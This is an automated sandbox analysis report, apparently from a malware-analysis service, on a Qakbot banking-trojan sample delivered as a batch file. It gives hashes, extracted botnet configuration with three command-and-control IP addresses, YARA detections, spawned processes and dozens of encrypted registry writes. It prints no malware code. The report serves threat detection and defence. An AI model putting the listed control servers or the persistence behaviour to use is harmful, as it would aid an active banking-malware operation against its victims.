qakbot | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
18-04-2024 01:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

u2.bat
Size

326B
MD5

acaf01f83da439915027c3e2e900c8dd
SHA1

2861b4e463fa89e05f2d7d629fae5140cef49843
SHA256

3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d
SHA512

dc33e9b7e2dde66a3793955899221513e1f7b156801f1cc56eb48ad5cbf2b8c4facf8ad33c5bd63e4ec607e95e8b909f4bc280aaca4e29f07883879ec97a3e61

Score

10^/10

qakbot tchk08 1710958492 banker stealer trojan

Malware Config

Extracted

Family

qakbot

Botnet

tchk08

Campaign

1710958492

77.105.162.176:995

31.210.173.10:443

5.252.177.195:443

Attributes

camp_date
2024-03-20 18:14:52 +0000 UTC

Signatures

Detect Qakbot Payload 56 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3112-4-0x0000028D0E0C0000-0x0000028D0E0EF000-memory.dmp	family_qakbot_v5
behavioral2/memory/3112-8-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp	family_qakbot_v5
behavioral2/memory/3112-9-0x0000028D0E090000-0x0000028D0E0BD000-memory.dmp	family_qakbot_v5
behavioral2/memory/3112-12-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp	family_qakbot_v5
behavioral2/memory/3112-11-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp	family_qakbot_v5
behavioral2/memory/3112-14-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp	family_qakbot_v5
behavioral2/memory/3112-13-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-16-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/3112-22-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp	family_qakbot_v5
behavioral2/memory/3112-23-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-24-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/3112-26-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-27-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-25-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-36-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-37-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-38-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-39-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-40-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-46-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-49-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-50-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-51-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-52-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-53-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-56-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-57-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-58-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-59-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-64-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-65-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-66-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-67-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-70-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-71-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-72-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-73-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-76-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-77-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-78-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-79-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-82-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-83-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-85-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-86-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-89-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-90-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-91-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-92-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-95-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-96-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-97-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-98-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-99-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-100-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5
behavioral2/memory/2924-101-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp	family_qakbot_v5

Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
trojan banker stealer qakbot
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

qd_x86.exe

pid process

1856 qd_x86.exe
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

3112 rundll32.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

4680 ipconfig.exe

pid	process
1856	qd_x86.exe

pid	process
4680	ipconfig.exe

Modifies registry class 64 IoCs

Processes:

wermgr.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\e830a516 = a637ac74a0c4f916b0b5165d714e9ed1a9c40e5a9a8149ab86ae60ba4b18f99130d40371adec4fdcee3bfed246870e08fb5902d23348a18d774a7bd60d314d5b3d8dd5216e96b008182aae8a3b6d84f35f	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\8a43d291 = 2635d35cebca5e5df002746bf473a50793c6fb3a9f3e0bdb91076b9d76bb0314e05ebf810aa18900a3ef3a318bb93e5e699de17a80a96dc2e44babcd343c5fadc0784d7f4141a0dfeb5956a5b10566eb64	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\950cc9ba = 858116389f3061157ece00c071aafa286a3ae024c904ff654c142047d18ee68f92de18c524b8a4d1fa605145cb0d13bca7bfc34939034e4ac0a632cde2aad029839311209d034338263459b304e284f6ee01ec6a1b31f02cc040b8fab929588611	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\6c7aabec = e5262fe9de59f74bd8440d590f1f1f8092f6bdb23458272bca0388e7547b338975db2657b7057c1cf5de57d23439532201c0458f75f91526178dd51fe94e348b5480a356122ece484033f476f798c91639e8dc871479efab9fba553fd5d0fc66a52c9cbc10a8d75a09f6426a383a62b14f471c83e23d981787cbad4e7c88a93e596d6625db6fa9f4aea78d118384bd2963	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\8a43d291 = 862e3554c6522703b7d2f4ca14774cb5955b673fd03c1af3ea6179750ca11522b507d0570ac7b811bb39ec980f3e4fb544f0fa761c3fb43adfec96e28eb38bbf7345f78c1c09c667542f93622ec6c2a6c2	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\1b83ce59 = c5fa3f9f0020ee76953222cfc1aec3381144fb355202c81b588e59f5133d7d1aa942e8e453d51d5e24d28dcd85e41cb6a30919cf12c9129d42481d7ac6799fa5c4b61f794f8ff262b94e406500efd902373e5422c14ae9c2fd22d2bdb753338934	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\5363c03d = c68777b9bd995ff0bb12225b919e20ad5d51dc9bf720444580f1a102bf987bbda0b5845dbfc9a6104652c2bf72a0e2ca4959af378fd2650fd8848a80bb2ebff068a0385d0923ce5ea86fdbabaedd3acb4eb5b2899df114475890668a658d2abcb5	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\6dfdf66b = a55ffedf1ffd09a9fba7f970e3bc56021a9d33d1af575130aab52506cdd15c7bdd81b2529b3bfc53ee86bf13d5ea52176ee12aca81ef271b76b52f401b58d504410f8c03a8ad6e375f3b091d5385c8b61f	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\1b83ce59 = 44b968b4769ec5d1cd1bd4a92136663d85aaa1f7524832a6cf12079cca58d2a388b90d34e9aaad1ba197ddc370c00d18a5b31190f5fbc329387bda8c1f8357fa2673c7c7ce16f2b094a428ef3932482fc7ceaeda646a551899ec6a582a46402d68	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\6c7aabec = 8797df54e59eb038978e4355fa3abd94075f88f5d626889cd6cc3a06096e959f9271bfa621f3b076b2dc2d9b34e596b069b6141541f2beb8bc0d00bb0dbad1ac778ac37c52e80b9516bffb61b6538dfc1be1b98dc4ae923b2d1f68a4ffac9d9941f34e6958621badbb3ff7687c3a12539ff0183c8a7247d4a109fcd8072b394da487faaef86a99b23e5c5395e57a4957fc	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\8a43d291 = 6634286ad3aa21084c59ea8c6bb112def2b34e9b326b84a2a4dda7e5dde3c358bbbb972dfcdfa2483f485479fd55057bb8d017248fe13f0123ce6515fd7a49480f4d8f968dde05116d463f0398d0b2ed62	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\1b83ce59 = a7dbdd052b9a91b65e943466f9410fa0045e2555187e8a67cd0a0663d66f4d5ce61ee81c1737bf208324be589329b5e86eecb328c3a0cb6727f0fdbf4907380395eae4fbdc52d853ae67d19d79bffc2ba14157cd83b09bef97af91d975bbbeb130	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\8a43d291 = e57a0982a69a9e004ef22c45bcb342dded2b84a592698e5dd3011ed31fa339c051a91b672e29b944ffca4914700ac2a88967ac6642a92b81ca4bb3da3fe31d2ef309836039c10577f2aaa2d14137ac3c45	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\8a43d291 = a52ac9b10b949871d3ceb569a533056a4515cea90f6ba186b6610e217ed2d4f897fc69495b74cdf1becb49bd561f855b788dae64a492838c55bc21368ec9d8ddcd4cba63e6f3033d679fc97137e3107452	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\8a43d291 = c69b0f51049d340cb3db1a2a8fe96531edd8c71a369eb0c352d0e226fd647bee167fa9c949908d9891992391bda7fef4b4a0d2471c006f800c20a7d3705f928f1a811dbba07049aa3942adde3e9073e0c7	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\f77fbe3d = 85df0d34d171d028c81ff63ae7896570301119ff14a9e347a645db958a3e67db2a24ec998db63a21cc40863dce98ceec41bbb35ba5c5bef27bc24a5946c8d66738	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\3bd5bea3 = 8486556d661deba9d40c5743537f7278de6f3c230291a6cdf66623e44d0ff5ff0fd330ac22630bb6e869ab7dc140e7a6343804d74b7dfebfd0a74345ac2dd443910b12a25ca262b342394ec35c88616044	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\1b83ce59 = a7f3fbabfe478692c7355990d1ae1ae6070d0603e8a5da6f43f55ba17d5876a5f63d09ac809f5d0d313772f51f31e021c44760ec84162226f2879a64acdf51b73ee88deb02a8b7fe8665fe33959fbda2b9402f48bae7d77a98c98113e6dc504321	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\6c7aabec = e4a4b12c22b6f7ae9aaa0826471ce33388e83457b23c542d37dc09b259983cd3558de46c22156c4916fb095180633724c415ba1e36cdb08d365265a5ceff7ac29bbba551b7a9b2e47d88fc9af0ca6af30f7ca21d8b9484852d55ed091f2e137358c7652057fe141915918d850de9b63e0da7393f4f63ef72b2f5f14453579a7e23d24045a80c967e101c8997a930591533	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\fc3deaa3 = 6502b8e9beb0dc477e90a0e57410fe8d0b07cbed83d67d866d4d3c49a4bed191a4c0cd3c97d33935b6ec2118fcfe32150f3c150abbf8d94686cb83c5234a40abb4db581241b063d91b43ca1ba34c209cae0e15ae21908a4df2fff60482abc1fbb1	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\1b83ce59 = 64707860069db9d065b0a77818706698b30d0665cadf95ff3c93e07c592a9745a0938a04ca8148e09f383d6565ff9fa8341d7ac3d6d7362cb727dce9b44608c946239da4bb6defc113c12a8c42a2af367287e9d9b9e8687ba108eed39ccbf4384d	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\950cc9ba = e53c1ead175ce3e34edb0d34f619541abee0a95503af4c38df39d4db4e926a495713417ed5bc3750123ab43e1834914af24b729da160a4e482319cef38c5689a9d66a0e1107ebdf8739906efda77154ed1c989cf22575f9e7235bc39ea1f7ea78e	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\950cc9ba = 07e645d3132e5e390ce28bcebc70ed52f25f1e7e6899190e3659143d71bef846b0aee3a6eb4cbd48eb9a3c9754e3237befe83e8cd7a5c65553fd03471e12a158e5d6cc38264bd23eff0edfeed3f7f35a3651fff48b6951ece7c6ec96587470fa04	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\1b83ce59 = e6a61bba02affa6d0bc46c0ee217b066efaae7c06c240e38462bfdf0ca7c7680b02cdc2d07ad1b311e4eb8db291834347cb82ba77ef177c1c8f468cc427a4667fa99c9bef7d56ad257cffeabcdc674c21d7b8226085a4c5f0208c50674ddd64ecd	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\1b83ce59 = 07435b98733d14441daeafe36da2640b93ab6883bfadd7eb706d90280ae1d952610ba11fd4dce88e7f8f394d7511ab2062cc3a7cfc0f5868da518267f7f4759f3532e72fa07e048a8d782bc252c86200a8dd9247bd4c5f31b6d0aaa79d2bec3571	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\3a52e324 = 66de7c3b043343d6e4a6d0a234fa892fb5471b95cf65e5eb9fa956fdeb3366a6b456a76507e30642040b5f57fb5daa39af43c9964112731954dfa5b8a1ef99233a5b936fa9ac0821f5c2ee2f18007a50dae416496373f4fd8ff87f529b5ae4c6655fbb8dbc5f254f9295ca4bac5171bad88fd353b2d6119383dbbfb4006fa9bd5e2d64898d7c56585579e9bcf62cf52c9bc2cc0024ce147db7c337ce71bcd787dc55db8121585985a880388c4799560fb6	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\8a43d291 = e7666b1a82d2e3ec68ce0ffa9273cc778eaf153df04367edb0d2597bff7cda59ad13df2cac29e3f9fd0dbb33d1eb21ce31826b3fdf9b5865fd1093436ae21a8d7f7d6a56055f52aced587b15adc1b8240e	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\6c7aabec = 07e3caad81f8efa2fcd1876cb4de9466ab2bbc91afad14d7aafffc1380c836aeea26acd84fded761dd1721e51a72180bd1e9d0b68bf0facef78fb7eea2f4a4927b61ec240095334fe2a787df38d03ce998bfd410008b7ea8632779a87c4e25a05f243ba9130fc51260c2be18c495907d1fb38850d989f376f70788121c5fc1ff5e1b598a86cce787d8582dc29458528c07	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\6c7aabec = 87cf3bbc7296d4edef7a0d053c5f5873a3e383850c699eb767bd7b1be2e7b85baa589034c7ee48ccbdef904a2bb26ecf81ed0e2c96d9d384f18da76209005ddc61d7eeb7c84346dc249ac34394865d9b04ac7c142bd0d75f9d5b664a58c1a4b7c51ace4383d857a0a28608b42e25a83483618c7296ca6643327eb6a7f252118a91f28285d7ca12d90359856f7f969a3c6e	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\1b83ce59 = 464d691d90a5d58f3347b22db365fa6c31bf29ac1598963b4caf4311a79870422e1f77d3bc34b85ee08794b9eee34b18c8b69659fbf31620863751e19f78bd9952ec13d1a51e5711b017ebc4fd410d83aa24e3b16c3c0e15e59087ac0982caa4cc	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\6c7aabec = 452d1d5ea958062fdc7f7e2b7c8bf4fcb2cb7cbb5bdb7f02847e8fa8b476464cec7119aef84abd77696dffa2e05122597752f500c727eeb1d590ec2e1300a9fa25b1051e045e2764b4e7fcc174815fed43f6936b090c5a8ad26d5a1dd5b4fa0cb2d202b524d16a543fdf738b310646e11c4edf674267adf81981ecc1c29204a08080692994a5e5136ff63498385f830730	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\950cc9ba = e527291b4eee03dd93e919e0b84bee8ad0e1120ff96647406f79221882d4ddaf6fa7ff64315557c4f75e25bb8651fb0a9d2f1d9f982ebff7e4367b1f2d2f90785954a45ec39d4f52345b51270dd0e125d4c1cbd2e765bc237510e326e2f18172bb	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\950cc9ba = 8740142853a93dbf8bbf6dce7a1bc7ad7819500f79c0c9612a2531a72b7d7d7705d025ee0e2c2d870b8d762bda28fd757f1d2554d3bf7a4f72958bda1d5e41a6cbb66f06dacae10c32deb7f34e403c45836bf2964b33da2f5ebc85844ff233f355	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\950cc9ba = e5ddb39099622b96fc3f0b15f2529356dc0cd48d587b6f61ad6b6c2723bdd2e61519a9796684e4f9f50e067bb020808b7be7328fc182b1d1162871b89ebd84915246235151290dc5360f3648b5774807ccaed357927987a18fbda7d0626d7eadfb	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\6c7aabec = 44b15ec930d122f7c89487c221a1911a34c59a8e784cb71f79e5a8997af906c0bd7298ddd66ceab37da55b1cdc4a434713ed9fb4059856d60083520c0c0e56257c9c765c0ca7ba96e80530601670b7221189beda173c4cf2f2a766eda47bd220f21d6da082bb640863d1505c6393bee1b811074e959b59b571b93619d2e6a1dbd482b2a82bf432f8845b71804e6bdbc95a	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\7335b0c7 = e4216e220e5803aac6b6364ac6da099a66310403b11348a59372251912e6d544cdbd7941866bbf43a2950ed11cb28ec11adae2b0c0f9dcb95561bb5b79cf97e9dc0664ffada99ede703833a1b943182e4d3cfde186c806131aa6ac8ddf554bcaf4aba19f4bb0329a5f4757887d523a86691e2d324858c4740e835c8362690712ee63269a08c9511068363d41b63720f89e	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\7335b0c7 = 25c0cad77280c96a58c26690fc2317ad61810464e4412e693223897f33fb1f374608ea9a79351f73e3f95623be6034e80f5a3eb458ba1644444482b35b755b75587e24bdc5790acb80bfc849636396b8efc9eec55fa2882c8a647fe3e96067fdc6b5d5d1cbf0a65b7311037ec4a946cbac0789cfbd05f512b95417bc6df4ef3f5114d97a64e802de503d08151f20d338cb	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\950cc9ba = 26f020a79aa36503f1a3aabe1c19dfd589a88eaf97ef0129d6397c659db5e6c41063fe980591533f01c6cd19c3bf33d061f1371a1fb0c9cc0fb2afff2b3e41bfcb692056b483baf6309e3a95accf6c2b48763beeb8833716211d9468adce6aad11	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\7335b0c7 = c56c29547f7e52206f6f4b7a7ed225e77e869a068ed5220af8a1c9a08c8e04c23eed82b87326c27c830990e9901d78193c4235203696a3d9b70a16111bb73e9103388e85f3177a77dfa56923b4170c37f8ad490ffd71af3ef13922fdbcf306a77be24d461cf628d0b6f8d6c3797a2626c1a99fd71e5ae691edb4373c7ce8018ca07059228b7fa69332cdc7c4d2f0e767d3	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\950cc9ba = a66919ff1fd66db432f1389e0b68bdce080eb49abf58965684f4d255a9fc24e78dd0317dd4fd9d2545ca136ccfcc107d9f8ca5589af9b782b25ce480b9875fbbb34ab30344a7ed55cc870667c819d8687367f652267f92b19da5aa32dfe39c6dca	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\6c7aabec = 0439f62007a04667da42fbf7a7dc5a3290f7fb35a404c59b8f8780dbb1c4125d5e490d1410f50c39d3a3532285a2ae615d1c1e07c9be3a4bfafeda8588bd8b697ba3e308ceed9b3fa06fc35a603714ca1fe60d1cd9b288cb499b55bb9cd92d91625ac1921d99bc2f9bea04cc071c00230476b8938c08d3a7c009bda6b3c1e2c67abfe5dc2bcf9d4507cb9097cb43f4b2d0	wermgr.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\6c7aabec = a5ecde8a88399ae9470674193943a5c67d4e31b4bdef06bb6172c7b48fb2047047c809bf39b14773f4dca31c63ddf7a8b5e8f729148c7d370827fadeb40eb1a5443b95262e5e9b6e04defb32b6e405287fcbe2bd2e1ea068f84faef1a435bdbf70974de5ead182ff27648d159e2327fe2180702dfb4a4133ac40019bfd026acf7588f0e4b25fa5829e1ac786b1b9525a78	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\6c7aabec = a6d287cc7dc50d17ee1d3144b681cb4b17fe26cc7894d7990b943d0529218396cbba99da848e00422f8a7df96cfef7ddb1cf9c99a8f9e4b4e130bf1a5b27f835f18121b51befd50145d0dfe48054873bde87248bebb5db1cc07b482ae888a4e1fd0986a035f2a62fa6598ea7b4f2f744b55bcf2640bd6501bad699502c5d3cb3b571777b3078e78dbd523401f396923cad	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\6c7aabec = c470aaf2c9f875f606dfe73c14a009a116d9014cedf157a825fef2cdda5aa628a4c418e8b2bcc6fb746ab0223bf0ab6d524253b27e457dfd6587373fa7eb077c586cd29e89a7eff19dfa32768b8bb0e29e967f8a77ffab989ea04d4a19f4c0c98ac34ab08b2bbcc9f7320a0ff23c3c811d03d18dcc245647f96bf355dcfefa180ca0242c0721c48e13e94a1e188b1a190a	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\6c7aabec = 45ff53dee495cb128c932e5c8ac015fcc1ad56bc98aca1f75d2d9c61e878fbe31cd407c7759884442110d790773fedbf1cfbf9111e7386f09a4d1f1de79cef7a68c1c3dbf2b8d2bf18a1cf94dc7770508d628dba19b03992bede6194edbeb94c231eb55d62a3105d055b16adcb80fd7b325643f4f9d024d49ab2ce5d1dc29b9eb4	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\950cc9ba = 46cb4c57fe31e41824c1f08aae52036f7b9130915a7b314a898007c2a4f55d9eb66872b5c55433d0f325b7c2cb101c4dbda4a9a46ca110344311cf0fa696d0327789872667c60b47c3c071b1bb6688431537d3b0572c8a322128d4fbfa39407670	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\8a43d291 = a5f3f1d903719c03f1de6ea7a7df75b8171b08cdd6a71bcefa394b422a072d237604de42770ba24b14b5460fa3b28eaba02946fd1353a6705e55ce4b57f2eb62c4c98495bc736168d7e3d0045d2debcfe6	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\950cc9ba = 47df467b35b7e74a33cd206f04994de9d34a3b4424817f94564c9fb5f8e6ea6201b25a3b8d1a63d0213b344b288733ff89c43f015d8f3619de811cbb1d052915d068af46f1c5b716f1f042e8754c5920b809df523f7f77b4d7b05168aae4a021bb	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\950cc9ba = c4f97fa56e771acd06446356a89e0284cfcbf90075cea48c9c5a6d59ebef9deea8c5d0894a3b974f6e900e8ab9c55be459b5ea54e028b1ced61e43c0ab51d8835997246ffba7b9bfb91287445d65077649335e5bf9bb1c4048afa6c477978aa483	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\f6f8e3ba = 87ad0f94ea3611788e888fc32340b1b710c2d8fd9d242e4362e4f38c5601eb5e8feb4637fe01ae7bd9f30bd31db92cd085ae848415647b1ceca5af14e11e663dc2c310fc47066508bb5642914e63393d3b012ce1133eb3f550c391a4d4dd52102849b57036705a7306af150c156016be2ea963ea3768db11afcd8d8a60a56ab701	wermgr.exe
